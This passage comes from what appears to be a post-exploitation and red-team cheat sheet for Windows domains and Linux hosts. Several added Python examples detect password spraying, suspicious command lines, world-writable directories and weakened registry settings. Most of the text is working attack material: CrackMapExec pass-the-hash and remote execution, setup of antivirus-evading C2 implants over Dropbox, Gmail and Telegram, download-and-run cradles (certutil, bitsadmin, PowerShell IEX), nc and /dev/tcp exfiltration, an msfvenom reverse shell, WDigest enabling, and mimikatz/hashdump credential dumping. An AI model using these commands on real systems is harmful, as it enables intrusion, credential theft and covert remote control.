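    ("2024-01-29T07:51:06", "10.0.0.50", "carol"),
    ("2024-01-29T07:51:09", "10.0.0.50", "dave"),
    ("2024-01-29T07:51:12", "10.0.0.50", "erin"),
    ("2024-01-29T07:51:15", "10.0.0.50", "frank"),
    ("2024-01-29T07:55:00", "10.0.0.77", "dave"),
    ("2024-01-29T07:55:30", "10.0.0.77", "dave"),
    ("2024-01-29T07:56:00", "10.0.0.77", "dave"),
    ("2024-01-29T07:56:05", "10.0.0.77", "dave"),
    ("2024-01-29T08:10:00", "10.0.0.91", "alice"),   # a single mistyped password
]


def detect_spray(records: List[Record], window: timedelta = timedelta(minutes=10),
                 min_users: int = 5) -> Dict[str, List[str]]:
    """Sources that failed logons against >= min_users distinct accounts inside `window`.

    Returns {source_ip: sorted list of targeted accounts}. Thresholds are assumptions.
    """
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, user in records:
        by_src[src].append((datetime.fromisoformat(ts), user))
    alerts: Dict[str, List[str]] = {}
    for src, events in by_src.items():
        events.sort()
        # Slide a window starting at each event; stop at the first one that trips.
        for i, (t0, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - t0 <= window}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break
    return alerts


def detect_bruteforce(records: List[Record], window: timedelta = timedelta(minutes=10),
                      min_attempts: int = 3) -> Dict[Tuple[str, str], int]:
    """(source_ip, account) pairs with >= min_attempts failures inside `window`.

    Returns {(src, user): failure count in the densest window}.
    """
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, src, user in records:
        by_pair[(src, user)].append(datetime.fromisoformat(ts))
    alerts: Dict[Tuple[str, str], int] = {}
    for pair, times in by_pair.items():
        times.sort()
        best = 0
        for i, t0 in enumerate(times):
            best = max(best, sum(1 for t in times[i:] if t - t0 <= window))
        if best >= min_attempts:
            alerts[pair] = best
    return alerts


if __name__ == "__main__":
    print("spray  :", detect_spray(SAMPLE_FAILED_LOGONS))
    print("brute  :", detect_bruteforce(SAMPLE_FAILED_LOGONS))
```

The spray detector keys on distinct accounts per source, so a single source with one failure per account still trips it, which is exactly what a per-account lockout threshold never sees; the brute-force detector keys on repeats of one (source, account) pair. On real 4625 events the source field is the workstation name or network address and the timestamps come from the event, not from a list.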

Available modules

Logs are saved under ~/.cme/logs.
List the post-exploitation modules available for a protocol:
>crackmapexec smb -L
Commonly used modules:

| Module | Function |
|---|---|
| Get-ComputerDetails | Gets computer information |
| Bloodhound | Runs a BloodHound script to collect information |
| empire_exec | Interacts with Empire |
| enum_avproducts | Enumerates AV products |
| enum_chrome | Gets passwords saved in the target's Chrome |
| get_keystrokes | Keylogger |
| get_netdomaincontroller | Lists all domain controllers |
| get_netrdpsession | Lists active RDP sessions |
| gpp_autologin | Finds auto-logon account passwords in registry.xml on the domain controller |
| gpp_password | Returns GPP passwords from group-policy credentials |
| invoke_sessiongopher | Saves putty, winscp, filezilla, superputty and rdp sessions |
| invoke_vnc | Injects a VNC client into memory |
| met_inject | Interacts with msf |
| mimikatz | Invokes the mimikatz module |
| mimikatz_enum_chrome | Uses mimikatz to decrypt passwords saved by Chrome |
| mimikatz_enum_vault_creds | Decrypts passwords saved in the Windows credential manager |
| mimikittenz | Runs mimikittenz (a Windows password-harvesting tool) |
| multirdp | Allows multiple users to log in via RDP |
| netripper | Intercepts traffic via API hooking |
| pe_inject | DLL/EXE injection |
| rdp | Enables or disables RDP |
| shellcode_inject | Injects shellcode |
| tokens | Enumerates available tokens |
| uac | Checks whether UAC is enabled |
| wdigest | Enables or disables wdigest |
| web_delivery | Runs the exploit/multi/script/web_delivery module |

View a module's options:
>crackmapexec smb -M module --options
Usage:
>crackmapexec smb <target(s)> -u user -p 'P@ssw0rd' -M module -o PARAMETER=value

PTH

>crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
>crackmapexec smb <target(s)> -u username -H NTHASH

Executing commands

>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -x 'command'
-X runs a PowerShell command:
>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -X 'POWERSHELL_COMMAND'

koadic

https://github.com/zerosum0x0/koadic
>git clone https://github.com/zerosum0x0/koadic.git
>cd koadic
>pip3 install -r requirements.txt
>./koadic

SILENTTRINITY

https://github.com/byt3bl33d3r/SILENTTRINITY
Similar to a combination of Cobalt Strike and Empire.
>git clone https://github.com/byt3bl33d3r/SILENTTRINITY
>pip3 install --user pipenv && pipenv install && pipenv shell
>python st.py
On the server:
>python3 st.py teamserver <teamserver_ip> <teamserver_password>
>python3 st.py teamserver 192.168.0.108 123456
The --port parameter can be added to specify the port.
On the client:
>python3 st.py client wss://<username>:<teamserver_password>@<teamserver_ip>:5000
>python3 st.py client wss://y:123456@192.168.0.108:5000
>listeners  enter the listeners menu
>use http  select a listener
>options  show the parameters that need to be configured
>set Port 8081  configure a parameter with set
>start  start the listener
>list  show running listeners
>stop http  stop a listener with stop plus the listener name
>stagers  enter the payload menu
>list  list available payloads
>use payloadname  select a payload with use plus the payload name
>generate http  generate a payload with generate plus the listener name

Browser C2

Not blocked by the full 360 suite or Huorong. Drawbacks: a black console window appears, Chrome is opened, and features are limited.
https://github.com/0x09AL/Browser-C2
>go get -u github.com/gorilla/mux
>go get -u github.com/chzyer/readline
>git clone https://github.com/0x09AL/Browser-C2.git
Edit the C2 address in /Browser-C2/agent/agent.go.
Edit the location of Chrome.
Build the client:
>CGO_ENABLED=1 GOARCH= GOOS=windows go build
Edit the control server IP in /Browser-C2/static/jquery.js.
Go to the main directory and build the server:
>go build
Run the built client on the target machine while the attacking machine listens.
Communication between this framework and the target is unencrypted and the feature set is limited; it can hand sessions to frameworks such as msf, CS, PoshC2 and Empire.

DropBox C2

>git clone https://github.com/Arno0x/DBC2 dbc2
>cd dbc2
>pip install -r requirements.txt
>chmod +x dropboxC2.py
Create an app at https://www.dropbox.com/developers/apps/create, then generate an access token and put it in config.py.
Run it.
An encryption password for communicating with the controlled host has to be set here.
Publish the agent:
>publishStage dbc2_agent.exe
The listPublishedStage command shows the published agents.
Generate a payload:
>genStager [tab]  shows the formats that can be generated
>genStager oneliner default  generates a PowerShell payload
>genStager batch default  generates a bat payload
Msbuild and the rest are not demonstrated.
The PowerShell format is used here; run it on the controlled machine.
The attacking machine sees it check in.
>list  shows the controlled machines
Use the use command to interact with a controlled machine.
Enter ? to see the available commands.

Gmail C2

Gcat

Enable the setting at https://myaccount.google.com/lesssecureapps.
Enable IMAP in Gmail.
Convert the following script to an exe:
# setup.py
from distutils.core import setup
import py2exe
setup(console=['implant.py'])
https://github.com/byt3bl33d3r/gcat
Put implant.py from the gcat project in the same directory as the script above and edit the account details in implant.py.
>python 1.py py2exe
Packaging produces implant.exe under the dist directory for the controlled machine. The account details in the project's gcat.py must be edited as well.
Run implant.exe on the controlled machine. If it errors, change the following three lines of the email module:
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
After it runs, the mailbox receives a message.
The current sessions can also be obtained with gcat.py:
>python gcat.py -list
The host can now be controlled:
>python gcat.py -id [id] -cmd 'net user'
A job id is generated; specify the job id to view the output.
The output also appears in the mailbox.
When the controlled machine runs a Chinese-language system, the output raises an error; modify the code.
Other modules with output are fixed the same way and then repackaged with py2exe. Supported features: cmd, upload/download, shellcode execution, keylogging, screenshots and so on.

Gdog

https://github.com/maldevel/gdog
More features: encrypted transport, geolocation, command execution, upload/download, shellcode, screenshots, keylogging, shutdown/reboot, user logoff, downloading from the web, visiting websites, etc.
The setup is basically the same and also needs packaging into an exe, but some modules must be installed first: PyCrypto, WMI, Enum34, Netifaces.
# setup.py
from distutils.core import setup
import py2exe
setup(console=['client.py'])
client.py also needs decode gbk added where output is echoed.
If running client.exe raises an index-out-of-range error, search client.py for the string
for iface in netifaces.interfaces():
and change the line below it to
if netifaces.ifaddresses(iface)[netifaces.AF_LINK][0]['addr'] == self.MAC and netifaces.AF_INET in netifaces.ifaddresses(iface):
Run it after packaging.




If fetching the job id output errors, add:
reload(sys)
sys.setdefaultencoding("utf-8")
Executing shellcode:
>msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python
Strip the quotes and plus signs, keep only the shellcode and paste it into shell.txt.
>python gdog.py -id {id} -exec-shellcode /tmp/shell.txt

Telegram C2

Log in to Telegram, open https://telegram.me/botfather and send it a message.
Create a bot.
Once created it returns a token.
>pip install telepot
>pip install requests
>git clone https://github.com/blazeinfosec/bt2.git
Edit bt2.py and paste the token and chat id into the script.
The chat_id is obtained from https://api.telegram.org/bot<token>/getUpdates


When a controlled machine checks in, the available features are listed.


Windows: https://github.com/sf197/Telegra_Csharp_C2

Information gathering

Cmd

>whoami /user  view the current user's SID
>net config Workstation  view current computer information
>net time /domain  determine the primary domain: "error 5" means a domain exists but the current user is not a domain user; a time being shown means a domain exists and the current user is a domain user; "domain not found" means there is no domain
>net view /domain  list domains
>net group "Domain Controllers" /domain  view the primary domain controllers
>nltest /DCLIST:zone.com  view domain controllers
>net group "domain admins" /domain  view domain administrators
>net group "enterprise admins" /domain  view the enterprise administrators list
>net localgroup administrators /domain  view administrators group members
>net group "domain computers" /domain  view domain member computers
>net accounts /domain  view the password policy
>net user /domain  view domain users
>net view /domain:dc  query computers in the domain
>netsh firewall set opmode disable/enable  disable/enable the Windows firewall (Windows 2003)
>netsh advfirewall set allprofiles state off/on  (newer than Windows 2003)
>arp -a  view the ARP table
>net start  view services
>route print  view the routing table
>query user  view the connection state of users logged on to the machine
>tasklist /v  view processes, including those running as domain administrators
>dsquery server  query domain controllers
>dsquery computer  query domain computers
>dsquery user  query domain users
>dsquery ou  query organizational units in the domain
Export the domain DNS records (the file is saved under C:\Windows\System32\dns\):
>dnscmd /zoneexport zone.com 1.txt
Export the LDAP database:
>LDIFDE -f c:\windows\temp\dump.ldf -n -m

Wmi

>wmic OS get Caption,CSDVersion,OSArchitecture,Version  system version
>wmic service list brief  list local services
>wmic process list brief  list processes
>wmic process where name="chrome.exe" get executablepath  process path
>wmic process get caption,commandline /value >>1.txt  query the arguments of all processes
>wmic process where caption="svchost.exe" get caption,commandline /value  query the command line of one process
Create a process:
>wmic process call create calc
>wmic process call create "C:\shell.exe"
>wmic process call create "shutdown.exe -r -f -t 20"
Terminate a process:
>wmic process where name="shell.exe" call terminate
>wmic process where processid=PID delete
>wmic process 2345 call terminate
>wmic startup list brief  list autostart programs
>wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List  view antivirus software
>wmic netuse list brief  list mapped network drives
>wmic ntdomain list brief  query domain controllers
>wmic useraccount list brief  list local accounts and their SIDs
>wmic qfe list brief  list installed patches
>wmic share get name,path  view shares
>wmic startup list brief  view startup items
>wmic product get name,version  view installed software
>wmic product where "name like '%360%'" get name  look up a program name
>wmic product where name="360tray" call uninstall  uninstall a program
>wmic process where "name like '%360%'" get name  find a process's full name
>wmic process where name="360tray.exe" call terminate  stop a program
>wmic desktop get screensaversecure,screensavertimeout  view screensaver settings
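The discovery commands in the Cmd and Wmi lists above, and the regsvr32/mshta/rundll32 one-liners in the JSRat section, all show up in process-creation telemetry (Sysmon event 1 or Windows event 4688 with command-line logging enabled), which is where a defender catches them. The following is an added example, not part of the original notes: a Python rule set run over constructed process-creation events that tags the privileged-group enumeration, wmic process creation, remote-scriptlet regsvr32, javascript: one-liners and directory exports listed on this page. The sample events, hostnames and rule names are made up for illustration.

```python
"""Flag suspicious process command lines in constructed Windows process-creation events.

Added example, not from the original notes. The events are constructed; the
patterns correspond to the discovery and download-cradle commands listed in
the Cmd, Wmi and JSRat sections of these notes.
"""
import re
from typing import Dict, List, Tuple

Event = Tuple[str, str, str]  # (host, user, command line)

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS: List[Event] = [
    ("WS01", "CORP\\alice", 'net group "domain admins" /domain'),
    ("WS01", "CORP\\alice", 'wmic process call create "C:\\Users\\Public\\shell.exe"'),
    ("WS02", "CORP\\bob", "regsvr32.exe /u /n /s /i:http://192.0.2.10:1234/file.sct scrobj.dll"),
    ("WS02", "CORP\\bob", 'mshta javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'),
    ("DC01", "CORP\\svc_backup", "dnscmd /zoneexport zone.com 1.txt"),
    ("WS03", "CORP\\carol", "notepad.exe C:\\notes.txt"),
    ("WS03", "CORP\\carol", "net use Z: \\\\fileserver\\share"),
]

# (rule name, compiled pattern). Case-insensitive because cmd and wmic accept any case.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("privileged_group_enum",
     re.compile(r'net\s+group\s+"?(domain|enterprise)\s+admins"?\s+/domain', re.I)),
    ("wmic_process_create",
     re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I)),
    ("regsvr32_remote_sct",
     re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:https?://.*scrobj\.dll", re.I)),
    ("js_one_liner_host",
     re.compile(r"\b(mshta|rundll32)(\.exe)?\s+javascript:", re.I)),
    ("directory_export",
     re.compile(r"\b(dnscmd\s+/zoneexport|ldifde\s+-f)\b", re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule the command line matches (empty list when nothing matches)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events: List[Event]) -> List[Dict[str, object]]:
    """Run all rules over the events and return one finding per matching event."""
    findings: List[Dict[str, object]] = []
    for host, user, cmd in events:
        tags = classify(cmd)
        if tags:
            findings.append({"host": host, "user": user, "cmd": cmd, "tags": tags})
    return findings


def hosts_by_rule(findings: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Pivot findings into rule -> sorted hosts, the view an analyst triages from."""
    out: Dict[str, set] = {}
    for finding in findings:
        for tag in finding["tags"]:            # type: ignore[union-attr]
            out.setdefault(tag, set()).add(finding["host"])
    return {rule: sorted(hosts) for rule, hosts in out.items()}


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["host"], finding["user"], finding["tags"], "<-", finding["cmd"])
    print(hosts_by_rule(scan(SAMPLE_EVENTS)))
```

The regsvr32 rule keys on the combination of `/i:` with a URL and `scrobj.dll`, not on regsvr32 itself, since regsvr32 registering local DLLs is routine; likewise `net group` is only flagged for the two privileged groups, which is the query a domain user has no day-to-day reason to run.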

PowerView

Get domain information:
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Get-NetDomain}"
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; get-netforest}"
Enumerate administrators:
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-EnumerateLocalAdmin}"
Find machines where administrators are logged on:
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-userhunter}"
Find processes running as administrator on domain machines:
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-processhunter }"
Or use the userfile and computerfile parameters to query a given user's processes on a given machine:
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-processhunter -Userfile .\user.txt -computerfile .\host.txt}"
Find shares on domain machines:
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-sharefinder}"
List domain machines:
>Get-NetComputer -Domain zone.com
>Find-LocalAdminAccess -verbose  find machines the current domain user can log on to as a local administrator
Dev-powerview: get domain controllers and their Windows version:
>Get-DomainController |select name,osversion|fl

Linux

Operating system, kernel version and environment variables:
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
>cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set
Processes running as root:
>ps aux | grep root
>ps -ef | grep root
Scheduled tasks:
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root
IP information:
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network
Connection information:
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w
User information:
>id
>whoami
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # list superusers
>awk -F: '($3 == "0") {print}' /etc/passwd   # list superusers
>cat /etc/sudoers
>sudo -l
Command history:
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
Writable directories:
>find / -writable -type d 2>/dev/null      # writable directories
>find / -perm -222 -type d 2>/dev/null     # writable directories
>find / -perm -o w -type d 2>/dev/null     # world-writable directories
>find / -perm -o x -type d 2>/dev/null     # world-executable directories
>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writable and executable directories
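The world-writable directory checks at the end of the list are as useful for hardening as for enumeration, but the raw `find` output needs one refinement: a world-writable directory with the sticky bit (like /tmp) is expected, while one without it lets any local user delete or replace other users' files. The following is an added example, not from the original notes: a Python audit that walks a tree the way `find / -perm -o w -type d` does, reports the sticky bit alongside each hit, and builds its own constructed sample tree in a temporary directory so it runs offline. The sample layout and function names are assumptions.

```python
"""Audit a directory tree for world-writable directories.

Added example, not from the original notes: the page's `find / -perm -o w -type d`
carried through in Python, with the sticky-bit caveat handled (a sticky
world-writable directory such as /tmp is expected; one without the sticky bit
lets any user delete or replace other users' files).
"""
import os
import shutil
import stat
import tempfile
from typing import List, Tuple


def find_world_writable_dirs(root: str) -> List[Tuple[str, bool]]:
    """Return sorted (path relative to root, has_sticky_bit) for every world-writable dir."""
    findings: List[Tuple[str, bool]] = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)          # lstat: do not follow symlinked directories
            except OSError:
                continue                     # unreadable entries are skipped, like 2>/dev/null
            if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
                sticky = bool(st.st_mode & stat.S_ISVTX)
                findings.append((os.path.relpath(full, root), sticky))
    return sorted(findings)


def risky_dirs(root: str) -> List[str]:
    """World-writable directories without the sticky bit: the ones worth fixing."""
    return [path for path, sticky in find_world_writable_dirs(root) if not sticky]


def build_sample_tree() -> str:
    """Constructed layout in a temp dir (not a real system); remove it with cleanup()."""
    root = tempfile.mkdtemp(prefix="ww_audit_")
    layout = {
        "opt": 0o755,
        "opt/app": 0o755,
        "opt/app/uploads": 0o777,         # world-writable, no sticky bit: risky
        "opt/app/uploads/cache": 0o770,   # group-writable only
        "tmp": 0o1777,                    # world-writable with sticky bit, like /tmp
        "etc": 0o755,                     # normal
    }
    for rel in layout:
        os.makedirs(os.path.join(root, rel), exist_ok=True)
    for rel, mode in layout.items():      # chmod after creation so the umask does not interfere
        os.chmod(os.path.join(root, rel), mode)
    return root


def cleanup(root: str) -> bool:
    """Remove the sample tree; returns True when it is gone."""
    shutil.rmtree(root, ignore_errors=True)
    return not os.path.exists(root)


if __name__ == "__main__":
    sample = build_sample_tree()
    for path, sticky in find_world_writable_dirs(sample):
        print(f"{path}  sticky={sticky}")
    print("fix these:", risky_dirs(sample))
    cleanup(sample)
```

Run against `/` as root it reproduces the `find` results; the `risky_dirs` list is the remediation queue, and the usual fix is either removing the world-write bit or adding the sticky bit (`chmod +t`) where shared scratch space is actually needed.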

HTTP servers

>python2 -m SimpleHTTPServer
>python3 -m http.server 8080
>php -S 0.0.0.0:8888
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
>openssl s_server -key key.pem -cert cert.pem -accept 443 -WWW
>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start"
>ruby -run -e httpd . -p 8888

File operations

Windows: find files

>cd /d E: && dir /b /s index.php
>for /r E:\ %i in (index*.php) do @echo %i
>powershell Get-ChildItem d:\ -Include index.php -recurse

Linux: find files

#find / -name index.php
Find webshell files
>find . -name '*.php' | xargs grep -n 'eval('
>find . -name '*.php' | xargs grep -n 'assert('
>find . -name '*.php' | xargs grep -n 'system('

Create

Read a text file:
>$file = Get-Content "1.txt"
>$file
>powershell Set-Content "1.txt" "wocao"
&
>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"

Compress

>rar.exe a -k -r -s -m3 C:\1.rar C:\wwwroot
>7z.exe a -r -p12345 C:\1.7z C:\wwwroot

Extract

>rar.exe e c:\wwwroot\1.rar
>7z.exe x -p12345 C:\1.7z -oC:\wwwroot

Transfer

FTP

>open 192.168.0.98 21
>enter the username and password
>dir      (list files)
>get file.txt

VBS

#1.vbs
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\1.exe",2
>cscript 1.vbs

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
http.SetOption 2,13056    ' ignore HTTPS certificate errors
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\1.exe"
ado.Close

JS

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("1.exe");
>cscript /nologo 1.js http://192.168.1.192/Client.exe

Bitsadmin

>bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe"

Powershell

1
Note: may not work on kernel versions below 5.2
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'
>powershell
>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")
2
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'
3
>powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);
4
Newer PowerShell versions
>iwr -Uri http://192.168.0.106:1222/111.txt -outfile 123.txt -UseBasicParsing
5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates>Import-Module BitsTransfer
>$path = [environment]::getfolderpath("temp")
>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt"
>Invoke-Item "$path\ok.txt"

Certutil

>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
Base64-encode the file, download it, then decode and run it
>base64 payload.exe > /var/www/html/1.txt      # on the C&C, produce the base64-encoded exe
>certutil -urlcache -split -f http://192.168.0.107/1.txt & certutil -decode 1.txt ms.exe & ms.exe

Python

#python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'

Perl

#!/usr/bin/perl
use LWP::Simple;
getstore("http://192.168.1.192/Client.exe", "1.exe");

PHP

#!/usr/bin/php
<?php
$data = @file("http://192.168.1.192/Client.exe");
$lf = "1.exe";
$fh = fopen($lf, 'w');
fwrite($fh, implode('', $data));   // file() returns an array of lines; write all of them, not just the first
fclose($fh);
?>

Curl

#curl -o 1.exe http://192.168.1.192/Client.exe

wget

#wget http://192.168.1.192/Client.exe
#wget -b      download in the background
#wget -c      resume an interrupted download

nc

>nc -lvnp 333 >1.txt
On the target
>nc -vn 192.168.1.2 333 <test.txt -q 1
&
>cat 1.txt >/dev/tcp/1.1.1.1/333

SCP

Transferring files on Linux
>scp -P 22 file.txt user@1.1.1.1:/tmp

Hashes & passwords

Online cracking sites

https://www.objectif-securite.ch/en/ophcrack
http://cracker.offensive-security.com/index.php

Cracking hashes with Google Colab

I had seen an article about this on FreeBuf earlier and recently came across the script on GitHub, so I tried it; the speed is respectable.
https://www.freebuf.com/geek/195453.html
https://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a
Open https://drive.google.com/drive, create a new folder, right-click it and choose More > Google Colaboratory.
If it is not listed, click "Connect more apps", search for that name and install it.
Install hashcat and download a wordlist.
Set the runtime type to GPU acceleration.
Testing with a simple password here.
1.2 billion entries take roughly 20-odd minutes. The wordlist used above: https://download.weakpass.com/wordlists/1851/hashesorg2019.gz

Password policy

By default the machine account password is changed every 30 days.
>Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters, value DisablePasswordChange: set to 1 to disable machine account password changes.
>Group Policy (gpedit.msc) can change the default 30 days at "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"; 0 means unlimited.
>Disabling machine account password changes exists to support VDI (virtual desktops) and similar scenarios; the setting is "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes".
Debug Privilege
Local Security Policy > Local Policies > User Rights Assignment > Debug programs

Enabling WDigest

          Cmd

          >reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

          powershell

          >Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

          meterpreter

          >reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1
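The two registry values discussed above (WDigest UseLogonCredential and Netlogon DisablePasswordChange) are both one-line changes that silently weaken credential protection, so they belong in a configuration audit. The following is an added example, not part of the original notes and not from any tool they mention: it parses a constructed `reg export` dump and reports every value that deviates from a small policy table. The policy table, the expected values and the sample export are assumptions made for the example.

```python
import re

# Constructed `reg export` output, not from a real host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest]
"UseLogonCredential"=dword:00000001
"Negotiate"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters]
"DisablePasswordChange"=dword:00000001
"MaximumPasswordAge"=dword:0000001e
"""

# Hypothetical policy table: (key path, value name) -> (expected dword, why it matters).
POLICY = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest", "UseLogonCredential"):
        (0, "WDigest keeps plaintext credentials in LSASS memory"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters", "DisablePasswordChange"):
        (0, "machine account password rotation is disabled"),
}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg(text):
    """Map (lower-cased key path, value name) -> int for every dword value in a .reg export."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1).lower()   # registry paths are case-insensitive
            continue
        m = _DWORD_RE.match(line)
        if m and key is not None:
            values[(key, m.group(1))] = int(m.group(2), 16)
    return values


def audit(text):
    """Return (value name, observed, expected, reason) for each value that deviates from POLICY.

    An absent value is left to the OS default and is not reported here.
    """
    values = parse_reg(text)
    findings = []
    for (key, name), (expected, reason) in POLICY.items():
        observed = values.get((key.lower(), name))
        if observed is not None and observed != expected:
            findings.append((name, observed, expected, reason))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_REG):
        print(finding)
```

Feed it the output of `reg export HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest wdigest.reg` (and the Netlogon key) collected from each host; the remediation for the first finding is the same `reg add` command shown above with `/d 0`, and Sysmon Event ID 13 on that value path gives the real-time signal that someone flipped it back.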

Getpass

>getpassword.exe>1.txt

QuarksPwDump

>QuarksPwDump.exe -dump-hash-local

MSF

Meterpreter > run hashdump
&
Meterpreter > mimikatz_command -f samdump::hashes
&
Meterpreter > load mimikatz
Meterpreter > wdigest
&
Meterpreter > load mimikatz
Meterpreter > msv
Meterpreter > kerberos
&
Meterpreter > load kiwi
Meterpreter > creds_all
&
Meterpreter > migrate PID
Meterpreter > load mimikatz
Meterpreter > mimikatz_command -f sekurlsa::searchPasswords
&
Meterpreter > run windows/gather/smart_hashdump

Empire

>usemodule credentials/mimikatz/dcsync_hashdump

Invoke-Dcsync

>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync"

Mimikatz

Invoking mimikatz remotely

Dump plaintext
